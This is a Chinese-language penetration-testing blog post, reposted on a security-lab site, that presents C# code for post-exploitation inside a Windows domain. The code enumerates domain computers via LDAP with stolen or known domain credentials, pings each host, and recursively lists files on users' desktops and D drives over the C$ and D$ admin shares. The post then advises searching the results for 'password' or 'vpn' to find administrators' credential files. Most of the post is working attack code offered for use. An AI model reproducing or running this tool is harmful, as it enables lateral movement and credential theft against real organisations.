域内批量获取敏感文件
域内如果我们要获取指定机器,恰巧那台机器为linux只开了22等端口或者说无法从常规web打点进入,我们可以寻找运维机器的密码本,一台一台翻的话成本太高,就可以通过批量获取域内桌面文件。
0x01 批量获取域内机器名
自动化工具,当然就要全自动,懒人必备。net group “domain computers” /do ,获取机器是3个一排,然后可以通过正则删除空格,每次也麻烦,直接获取机器名更加方便。
思路就是连接ldap然后指定过滤条件(&(objectclass=computer))获取机器。
获取域内机器
public static DirectoryEntry coon = null;
public static DirectorySearcher search = null;
url = "LDAP://" + ip;
username = domain user;
password = domain pass;
coon = new DirectoryEntry(url, username, password);
search = new DirectorySearcher(coon);
search.Filter = "(&(objectclass=computer))
foreach (SearchResult r in Ldapcoon.search.FindAll())
{
string computername = "";
computername = r.Properties["cn"][0].ToString();
Console.WriteLine(computername);
}![图片[1]-域内批量获取敏感文件-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd093943.png)
0x02 机器探测存活
1.把上述机器放入machine.txt内,然后逐行读取
StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream)
{
string machine = machine_name.ReadLine();
Console.WriteLine(machine);
}2.探测探测存活,这里面向谷歌
public static bool IsMachineUp(string hostName)
{
bool retVal = false;
try
{
Ping pingSender = new Ping();
PingOptions options = new PingOptions();
// Use the default Ttl value which is 128,
// but change the fragmentation behavior.
options.DontFragment = true;
// Create a buffer of 32 bytes of data to be transmitted.
string data = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
byte[] buffer = Encoding.ASCII.GetBytes(data);
int timeout = 800;
PingReply reply = pingSender.Send(hostName, timeout, buffer, options);
if (reply.Status == IPStatus.Success)
{
retVal = true;
}
}
catch (Exception ex)
{
retVal = false;
//Console.ForegroundColor = ConsoleColor.Red;
//Console.WriteLine("[-]" + ex.Message);
//Console.ForegroundColor = ConsoleColor.White;
}
return retVal;
}0x03 获取桌面文件
我们这里构造获取结果目录呈现结果为:
TargetDesktopinfos
机器1
用户A
文件
用户B
文件
机器2
用户C
文件
用户D
文件首先获取当前路径创建TargetDesktopinfos目录。
string currentpath = Directory.GetCurrentDirectory();
DesktopFiles = currentpath + "\TargetDesktopinfos";
Directory.CreateDirectory(DesktopFiles);然后获取目标机器c:\users\目录,如果存在该目录创建机器名
string userpath = @"\" + machine + @"\c$\users";
var user_list = Directory.EnumerateDirectories(userpath);
if (Directory.Exists(userpath))
{
//创建机器名文件夹
string MachineFolder = DesktopFiles + "\" + machine;
Directory.CreateDirectory(MachineFolder);再遍历users目录存在哪些用户,同理如果存在desktop目录创建用户名和desktop.txt。
string userpath = @"\" + machine + @"\c$\users";
var user_list = Directory.EnumerateDirectories(userpath);
if (Directory.Exists(userpath))
{
//创建机器名文件夹
string MachineFolder = DesktopFiles + "\" + machine;
Directory.CreateDirectory(MachineFolder);
foreach (string user in user_list)
{
string DesktopDirectoryPath = user + "\desktop";
string username = substring(user);
if (Directory.Exists(DesktopDirectoryPath))
{
//创建用户名文件夹
string UserFolder = MachineFolder + "\" + username;
Directory.CreateDirectory(UserFolder);
//创建desktop.txt文件
string Desktoptxt = UserFolder + "\desktop.txt";
StreamWriter sw = File.CreateText(Desktoptxt);
sw.Close();接下来就是遍历desktop目录所有文件以及文件夹内的文件。
这里用到Directory.GetFileSystemEntries方法
public static string[] GetFileSystemEntries (string path, string searchPattern, System.IO.SearchOption searchOption);
第一个参数path:要搜索的路径。第二个参数searchPattern:要与
path中的文件和目录的名称匹配的搜索字符串。第三个参数searchOption,指定搜索操作是应仅包含当前目录还是应包含所有子目录的枚举值之一
这里的SearchOption.AllDirectories我们使用SearchOption.AllDirectories,表示在搜索操作中包括当前目录和所有它的子目录。
完整代码如下
try
{
string DesktopFiles = "";
//获取机器名
StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream)
{
try
{
string machine = machine_name.ReadLine();
if (IsMachineUp(machine))
{
//获取当前路径
string currentpath = Directory.GetCurrentDirectory();
DesktopFiles = currentpath + "\\TargetDesktopinfos";
Directory.CreateDirectory(DesktopFiles);
Console.WriteLine("[*]" + machine);
//获取users目录
string userpath = @"\\" + machine + @"\c$\users";
var user_list = Directory.EnumerateDirectories(userpath);
if (Directory.Exists(userpath))
{
//创建机器名文件夹
string MachineFolder = DesktopFiles + "\\" + machine;
Directory.CreateDirectory(MachineFolder);
foreach (string user in user_list)
{
string DesktopDirectoryPath = user + "\\desktop";
string username = substring(user);
if (Directory.Exists(DesktopDirectoryPath))
{
//创建用户名文件夹
string UserFolder = MachineFolder + "\\" + username;
Directory.CreateDirectory(UserFolder);
//创建desktop.txt文件
string Desktoptxt = UserFolder + "\\desktop.txt";
StreamWriter sw = File.CreateText(Desktoptxt);
sw.Close();
string info_user = substring(user);
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("[*]" + info_user);
Console.ForegroundColor = ConsoleColor.White;
string[] AllFiles = Directory.GetFileSystemEntries(DesktopDirectoryPath, "*", SearchOption.AllDirectories);
foreach (string file in AllFiles)
{
Console.WriteLine(file);
string create_time = Directory.GetCreationTime(file).ToString();
string writeFileTo = "create time:" + create_time + " " + file + "\r\n";
File.AppendAllText(Desktoptxt, writeFileTo);
}
}
else
{
continue;
}
}
}
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[-]" + machine + " is down");
Console.ForegroundColor = ConsoleColor.White;
}
}
catch (System.Exception ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[-] error");
Console.WriteLine("[-] Exception: " + ex.Message);
Console.ForegroundColor = ConsoleColor.White;
continue;
}
}
machine_name.Close();
Console.WriteLine("[+]out put to:" + DesktopFiles);
}
catch (System.Exception ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[-] error");
Console.WriteLine("[-] Exception: " + ex.Message);
Console.ForegroundColor = ConsoleColor.White;
return;
}同理要获取DEF盘,这里就举例D盘
public static void D()
{
try
{
string DFiles = "";
StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream)
{
try
{
string machine = machine_name.ReadLine();
if (IsMachineUp(machine))
{
string currentpath = Directory.GetCurrentDirectory();
DFiles = currentpath + "\\DInfos";
Directory.CreateDirectory(DFiles);
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("[*]" + machine);
Console.ForegroundColor = ConsoleColor.White;
//获取users目录
string dpath = @"\\" + machine + @"\d$";
var d_list = Directory.EnumerateDirectories(dpath);
if (Directory.Exists(dpath))
{
//创建机器名文件夹
string MachineFolder = DFiles + "\\" + machine;
Directory.CreateDirectory(MachineFolder);
//创建输出文本
string E_txt = MachineFolder + "\\dFiles.txt";
StreamWriter sw = File.CreateText(E_txt);
sw.Close();
try
{
var files = Directory.GetFiles(dpath);
foreach (string file in files)
{
Console.WriteLine(file);
string create_time = Directory.GetCreationTime(file).ToString();
string writeFileTo = "create time:" + create_time + " " + file + "\r\n";
File.AppendAllText(E_txt, writeFileTo);
}
var directorys = Directory.EnumerateDirectories(dpath);
foreach (string directory in directorys)
{
if (!directory.Contains("System Volume Information"))
{
string[] AllFiles = Directory.GetFileSystemEntries(directory, "*", SearchOption.AllDirectories);
foreach (string file in AllFiles)
{
string create_time = Directory.GetCreationTime(file).ToString();
Console.WriteLine(file);
string writeFileTo = "create time:" + create_time + " " + file + "\r\n";
File.AppendAllText(E_txt, writeFileTo);
}
}
}
}
catch (UnauthorizedAccessException ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine(ex.Message);
Console.ForegroundColor = ConsoleColor.White;
//goto cc;
}
}
}
}
catch (System.Exception ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[-] 不存在D盘");
Console.WriteLine(ex.Message);
Console.ForegroundColor = ConsoleColor.White;
continue;
}
}
machine_name.Close();
Console.WriteLine("[+]out put to:" + DFiles);
}
catch (System.Exception ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[-] error");
Console.WriteLine("[-] Exception: " + ex.Message);
Console.ForegroundColor = ConsoleColor.White;
return;
}
}这里我们在08这台域机器桌面存放文件
![图片[2]-域内批量获取敏感文件-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd094947.png)
测试效果
![图片[3]-域内批量获取敏感文件-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd094956-1024x632.png)
结果呈现
![图片[4]-域内批量获取敏感文件-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd095006-1024x272.png)
接下来直接文件夹搜索password或者vpn等关键字即可。
本文作者:jumper
本文转载于先知社区,如有侵权请联系删除
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
![表情[chi]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/chi.gif)
![表情[xiaojiujie]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/xiaojiujie.gif)
![表情[weiqu]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/weiqu.gif)
![表情[qinqin]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/qinqin.gif)
![表情[leiben]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/leiben.gif)
![表情[baiyan]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/baiyan.gif)
请登录后查看评论内容